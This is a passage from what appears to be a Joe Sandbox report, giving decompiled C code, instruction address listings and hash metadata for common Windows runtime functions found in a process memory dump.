				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                              0x017e51be
                                                                              0x017e51c3
                                                                              0x017e51c8
                                                                              0x017e51cd
                                                                              0x017e51d0
                                                                              0x017e51d3
                                                                              0x017e51d8
                                                                              0x017e51db
                                                                              0x017e51de
                                                                              0x017e51e0
                                                                              0x017e51e3
                                                                              0x017e51e6
                                                                              0x017e51e8
                                                                              0x017e5342
                                                                              0x017e5351
                                                                              0x017e5356
                                                                              0x017e535a
                                                                              0x017e5360
                                                                              0x017e5363
                                                                              0x017e5366
                                                                              0x017e5369
                                                                              0x017e5369
                                                                              0x017e536b
                                                                              0x017e536b
                                                                              0x017e5370
                                                                              0x017e53a3
                                                                              0x017e53a4
                                                                              0x017e53a6
                                                                              0x017e53ab
                                                                              0x017e53ab
                                                                              0x017e53ae
                                                                              0x017e53ae
                                                                              0x017e53b5
                                                                              0x017e53bf
                                                                              0x017e53bf
                                                                              0x017e5375
                                                                              0x017e5396
                                                                              0x017e53a0
                                                                              0x017e53a0
                                                                              0x00000000
                                                                              0x017e5396
                                                                              0x017e5377
                                                                              0x017e5379
                                                                              0x017e537f
                                                                              0x017e538c
                                                                              0x017e5390
                                                                              0x00000000
                                                                              0x017e5390
                                                                              0x017e51ee
                                                                              0x017e51f1
                                                                              0x017e5301
                                                                              0x017e5310
                                                                              0x017e5315
                                                                              0x017e5318
                                                                              0x017e531b
                                                                              0x017e5320
                                                                              0x017e532e
                                                                              0x017e5331
                                                                              0x00000000
                                                                              0x017e5331
                                                                              0x017e5328
                                                                              0x017e5329
                                                                              0x00000000
                                                                              0x017e5329
                                                                              0x017e51fa
                                                                              0x017e5235
                                                                              0x017e5236
                                                                              0x017e5239
                                                                              0x017e523f
                                                                              0x017e5240
                                                                              0x017e5241
                                                                              0x017e5242
                                                                              0x017e5246
                                                                              0x017e5247
                                                                              0x017e524e
                                                                              0x017e5251
                                                                              0x017e5267
                                                                              0x017e5269
                                                                              0x017e526e
                                                                              0x017e527d
                                                                              0x017e527e
                                                                              0x017e5281
                                                                              0x017e5282
                                                                              0x017e5287
                                                                              0x017e5288
                                                                              0x017e528a
                                                                              0x017e528f
                                                                              0x017e5294
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017e529a
                                                                              0x017e529c
                                                                              0x017e529e
                                                                              0x017e529e
                                                                              0x017e52a4
                                                                              0x017e52b0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017e52ba
                                                                              0x017e52bc
                                                                              0x017e52bc
                                                                              0x017e52d4
                                                                              0x017e52d9
                                                                              0x017e52dc
                                                                              0x017e52e1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017e52e7
                                                                              0x017e52f4
                                                                              0x00000000
                                                                              0x017e52f4
                                                                              0x017e5270
                                                                              0x00000000
                                                                              0x017e5270
                                                                              0x017e51fc
                                                                              0x017e51fd
                                                                              0x017e5202
                                                                              0x017e5203
                                                                              0x017e5205
                                                                              0x017e520a
                                                                              0x017e520f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017e521b
                                                                              0x017e5226
                                                                              0x017e522b
                                                                              0x017e521d
                                                                              0x017e521d
                                                                              0x017e5222
                                                                              0x017e5222
                                                                              0x017e522d
                                                                              0x00000000

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: Legacy$UEFI
                                                                              • API String ID: 2994545307-634100481
                                                                              • Opcode ID: d70816aa8b46643f571dc24db835703aa063cd87260033fc27fabe7ec12f7d22
                                                                              • Instruction ID: 1d8ed04f2e2b37474e3e38a76ac520c20ff84530b9aae7bd91101bbadf3f9ea8
                                                                              • Opcode Fuzzy Hash: d70816aa8b46643f571dc24db835703aa063cd87260033fc27fabe7ec12f7d22
                                                                              • Instruction Fuzzy Hash: DA517CB5A046099FDB25DFA8C898BAEFBF8FF48708F14406DE609EB251D7709900CB10
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0176B171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 78%
                                                                              			E0176B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x183f7a8);
				E017BD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E017BD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E017AD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E017AF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L017BDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E017AB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E017AB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E017AE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E017AA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                              0x0176b171
                                                                              0x0176b171
                                                                              0x0176b171
                                                                              0x0176b171
                                                                              0x0176b171
                                                                              0x0176b176
                                                                              0x0176b17b
                                                                              0x0176b180
                                                                              0x0176b186
                                                                              0x0176b18f
                                                                              0x0176b198
                                                                              0x0176b1a4
                                                                              0x0176b1aa
                                                                              0x017c4802
                                                                              0x017c4802
                                                                              0x017c4805
                                                                              0x017c480c
                                                                              0x017c480e
                                                                              0x0176b1d1
                                                                              0x0176b1d3
                                                                              0x0176b1de
                                                                              0x0176b1de
                                                                              0x017c4817
                                                                              0x017c481e
                                                                              0x017c4820
                                                                              0x017c4822
                                                                              0x017c4822
                                                                              0x017c4824
                                                                              0x017c4824
                                                                              0x017c482a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c4835
                                                                              0x017c483a
                                                                              0x017c483d
                                                                              0x017c483f
                                                                              0x017c4842
                                                                              0x017c4842
                                                                              0x017c4842
                                                                              0x017c4846
                                                                              0x017c484c
                                                                              0x017c484e
                                                                              0x017c4851
                                                                              0x017c4851
                                                                              0x017c4853
                                                                              0x017c4854
                                                                              0x017c4854
                                                                              0x017c4858
                                                                              0x017c485a
                                                                              0x017c485a
                                                                              0x017c485d
                                                                              0x017c485f
                                                                              0x017c4861
                                                                              0x017c4861
                                                                              0x017c4866
                                                                              0x017c486b
                                                                              0x017c486e
                                                                              0x017c4871
                                                                              0x017c4876
                                                                              0x017c4876
                                                                              0x017c4878
                                                                              0x017c487b
                                                                              0x017c4884
                                                                              0x017c4884
                                                                              0x00000000
                                                                              0x017c487d
                                                                              0x017c487d
                                                                              0x017c4882
                                                                              0x017c4889
                                                                              0x017c4889
                                                                              0x017c488f
                                                                              0x017c4891
                                                                              0x017c48e0
                                                                              0x017c48e2
                                                                              0x017c48e4
                                                                              0x017c48e4
                                                                              0x017c48e7
                                                                              0x017c48e7
                                                                              0x017c48ed
                                                                              0x017c48f4
                                                                              0x017c48f6
                                                                              0x017c4951
                                                                              0x017c4951
                                                                              0x017c4953
                                                                              0x017c4953
                                                                              0x017c4956
                                                                              0x017c4956
                                                                              0x017c4958
                                                                              0x017c4959
                                                                              0x017c4959
                                                                              0x017c495d
                                                                              0x017c495d
                                                                              0x017c495f
                                                                              0x017c495f
                                                                              0x017c4965
                                                                              0x017c4969
                                                                              0x017c49ba
                                                                              0x017c49ba
                                                                              0x017c49c1
                                                                              0x017c49c5
                                                                              0x017c49cc
                                                                              0x017c49d4
                                                                              0x017c49d7
                                                                              0x017c49da
                                                                              0x017c49e4
                                                                              0x017c49e5
                                                                              0x017c49f3
                                                                              0x017c4a02
                                                                              0x00000000
                                                                              0x017c4a02
                                                                              0x017c4972
                                                                              0x017c4974
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c4976
                                                                              0x017c4979
                                                                              0x017c4982
                                                                              0x017c4983
                                                                              0x017c4984
                                                                              0x017c498b
                                                                              0x017c498d
                                                                              0x017c4991
                                                                              0x017c4993
                                                                              0x017c4999
                                                                              0x017c499d
                                                                              0x017c49a2
                                                                              0x017c49a2
                                                                              0x017c49a2
                                                                              0x017c4999
                                                                              0x017c49ac
                                                                              0x00000000
                                                                              0x017c49b3
                                                                              0x017c48f8
                                                                              0x017c48fe
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c48fe
                                                                              0x017c4895
                                                                              0x017c489c
                                                                              0x017c48ad
                                                                              0x017c48b2
                                                                              0x017c48b5
                                                                              0x017c48b7
                                                                              0x017c48ba
                                                                              0x017c48bc
                                                                              0x017c48c6
                                                                              0x017c48c6
                                                                              0x017c48cb
                                                                              0x017c48d1
                                                                              0x017c48d4
                                                                              0x017c48d8
                                                                              0x017c48d8
                                                                              0x00000000
                                                                              0x017c48d8
                                                                              0x017c48be
                                                                              0x017c48c0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c48c2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c48c4
                                                                              0x00000000
                                                                              0x017c4882
                                                                              0x017c487b
                                                                              0x017c4904
                                                                              0x017c4906
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c4908
                                                                              0x017c490e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c4910
                                                                              0x017c4917
                                                                              0x017c4917
                                                                              0x00000000
                                                                              0x017c4917
                                                                              0x0176b1ba
                                                                              0x017c47f9
                                                                              0x017c47fc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c47fc
                                                                              0x0176b1c0
                                                                              0x0176b1c0
                                                                              0x0176b1c3
                                                                              0x0176b1cb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID: _vswprintf_s
                                                                              • String ID:
                                                                              • API String ID: 677850445-0
                                                                              • Opcode ID: e5843a7dfce786ae248f84ccfb58a912a4df1167b818b6feb56cec658c06062f
                                                                              • Instruction ID: 79271f692f5450158546a3fcec0cd93da4bac9e4d88361ec96d736e36067a7d9
                                                                              • Opcode Fuzzy Hash: e5843a7dfce786ae248f84ccfb58a912a4df1167b818b6feb56cec658c06062f
                                                                              • Instruction Fuzzy Hash: BC51B075D0026A8EEF35CF68C854BEEFBF0AF45B10F1042ADD85AAB286D7744941CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0178B944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 76%
                                                                              			E0178B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x185d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01787D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01838CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E017A9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E017AB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E017ACE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01787D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01838F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E017AAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1858628; // 0x0
								_v68 = _t77;
								_t78 =  *0x185862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1858628; // 0x0
							_t116 =  *0x185862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                              0x0178b94c
                                                                              0x0178b956
                                                                              0x0178b95c
                                                                              0x0178b95e
                                                                              0x0178b964
                                                                              0x0178b969
                                                                              0x0178b96d
                                                                              0x0178b96d
                                                                              0x0178b970
                                                                              0x0178b974
                                                                              0x0178b97a
                                                                              0x0178badf
                                                                              0x0178badf
                                                                              0x0178bae2
                                                                              0x0178bae4
                                                                              0x0178bae6
                                                                              0x0178baf0
                                                                              0x017d2cb8
                                                                              0x0178baf6
                                                                              0x0178baf6
                                                                              0x0178baf6
                                                                              0x0178bafd
                                                                              0x0178bb1f
                                                                              0x0178bb1f
                                                                              0x0178baff
                                                                              0x0178bb00
                                                                              0x0178bb00
                                                                              0x0178bb03
                                                                              0x0178bb03
                                                                              0x0178bacb
                                                                              0x0178bacf
                                                                              0x0178bad0
                                                                              0x0178bad1
                                                                              0x0178badc
                                                                              0x0178badc
                                                                              0x0178b980
                                                                              0x0178b980
                                                                              0x0178b988
                                                                              0x0178b98b
                                                                              0x0178b98d
                                                                              0x0178b990
                                                                              0x0178b993
                                                                              0x0178b999
                                                                              0x0178b99b
                                                                              0x0178b9a1
                                                                              0x0178b9a5
                                                                              0x0178b9aa
                                                                              0x0178b9b0
                                                                              0x0178b9bb
                                                                              0x0178b9c0
                                                                              0x0178b9c3
                                                                              0x0178b9ca
                                                                              0x0178b9cc
                                                                              0x0178b9cf
                                                                              0x0178b9d3
                                                                              0x0178b9d7
                                                                              0x0178ba94
                                                                              0x0178ba94
                                                                              0x0178ba98
                                                                              0x0178baa3
                                                                              0x017d2ccb
                                                                              0x0178baa9
                                                                              0x0178baa9
                                                                              0x0178baa9
                                                                              0x0178bab1
                                                                              0x017d2cd5
                                                                              0x017d2cdd
                                                                              0x017d2cdd
                                                                              0x0178babb
                                                                              0x0178babc
                                                                              0x0178bac2
                                                                              0x0178bac3
                                                                              0x0178bac3
                                                                              0x0178bac6
                                                                              0x00000000
                                                                              0x0178b9dd
                                                                              0x0178b9dd
                                                                              0x0178b9e7
                                                                              0x0178b9e7
                                                                              0x0178b9ec
                                                                              0x0178b9ec
                                                                              0x0178b9f1
                                                                              0x0178b9f5
                                                                              0x0178b9fa
                                                                              0x0178ba00
                                                                              0x0178ba0c
                                                                              0x0178ba10
                                                                              0x0178ba10
                                                                              0x0178ba12
                                                                              0x0178ba18
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0178bb26
                                                                              0x0178bb26
                                                                              0x0178ba1e
                                                                              0x0178ba1e
                                                                              0x0178ba23
                                                                              0x0178ba25
                                                                              0x0178ba2c
                                                                              0x0178ba30
                                                                              0x0178ba35
                                                                              0x0178ba35
                                                                              0x0178ba41
                                                                              0x0178ba46
                                                                              0x0178ba4c
                                                                              0x0178ba50
                                                                              0x0178ba54
                                                                              0x0178ba6a
                                                                              0x0178ba6e
                                                                              0x0178ba70
                                                                              0x0178ba74
                                                                              0x0178ba78
                                                                              0x0178ba7a
                                                                              0x0178ba7c
                                                                              0x0178ba8e
                                                                              0x0178ba90
                                                                              0x0178ba92
                                                                              0x0178bb14
                                                                              0x0178bb14
                                                                              0x0178bb16
                                                                              0x0178bb16
                                                                              0x00000000
                                                                              0x0178ba7c
                                                                              0x0178bb0a
                                                                              0x0178bb0d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0178bb0f

                                                                              APIs
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0178B9A5
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                              • String ID:
                                                                              • API String ID: 885266447-0
                                                                              • Opcode ID: 0f004020b3cde7cade6f4b3e6f8ed681acdfd4b0bcbc218aaf97c71322f590ed
                                                                              • Instruction ID: c00fe111a85c2c827ea39d7181bea6f96422abe46e1d94597744112ea7a8e76f
                                                                              • Opcode Fuzzy Hash: 0f004020b3cde7cade6f4b3e6f8ed681acdfd4b0bcbc218aaf97c71322f590ed
                                                                              • Instruction Fuzzy Hash: 82516671A08741CFC720EF69C08092AFBF5FB88610F64896EFA9687355D770E944CB92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01792581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 86%
                                                                              			E01792581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, void* _a12, void* _a16, void* _a20, void* _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				void* _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t240;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t275;
				signed int _t281;
				signed int _t283;
				void* _t285;
				void* _t286;
				unsigned int _t290;
				signed int _t294;
				void* _t295;
				signed int _t321;
				signed int _t323;
				signed int _t328;
				signed int _t329;
				signed int _t331;
				void* _t332;
				signed int _t335;
				signed int _t338;
				signed int _t339;
				void* _t343;

				_t335 = _t338;
				_t339 = _t338 - 0x4c;
				_v8 =  *0x185d360 ^ _t335;
				_t328 = 0x185b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t290 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t343 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t281 = 0x48;
				_t310 = 0 | _t343 == 0x00000000;
				_t321 = 0;
				_v37 = _t343 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t281 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t329 = 0xc0000106;
						goto L32;
					} else {
						_t328 = L01784620(_t290,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t281);
						_v52 = _t328;
						__eflags = _t328;
						if(_t328 == 0) {
							_t329 = 0xc0000017;
							goto L32;
						} else {
							 *(_t328 + 0x44) =  *(_t328 + 0x44) & 0x00000000;
							_t50 = _t328 + 0x48; // 0x48
							_t323 = _t50;
							_t310 = _v32;
							 *(_t328 + 0x3c) = _t281;
							_t283 = 0;
							 *((short*)(_t328 + 0x30)) = _v48;
							__eflags = _t310;
							if(_t310 != 0) {
								 *(_t328 + 0x18) = _t323;
								__eflags = _t310 - 0x1858478;
								 *_t328 = ((0 | _t310 == 0x01858478) - 0x00000001 & 0xfffffffb) + 7;
								E017AF3E0(_t323,  *((intOrPtr*)(_t310 + 4)),  *_t310 & 0x0000ffff);
								_t310 = _v32;
								_t339 = _t339 + 0xc;
								_t283 = 1;
								__eflags = _a8;
								_t323 = _t323 + (( *_t310 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t275 = E017F39F2(_t323);
									_t310 = _v32;
									_t323 = _t275;
								}
							}
							_t294 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t329 = _v68;
								__eflags = 0;
								 *((short*)(_t323 - 2)) = 0;
								goto L32;
							} else {
								_t281 = _t328 + _t283 * 4;
								_v56 = _t281;
								do {
									__eflags = _t310;
									if(_t310 != 0) {
										_t240 =  *(_v60 + _t294 * 4);
										__eflags = _t240;
										if(_t240 == 0) {
											goto L30;
										} else {
											__eflags = _t240 == 5;
											if(_t240 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t281 =  *(_v60 + _t294 * 4);
										 *(_t281 + 0x18) = _t323;
										_t244 =  *(_v60 + _t294 * 4);
										__eflags = _t244 - 8;
										if(__eflags > 0) {
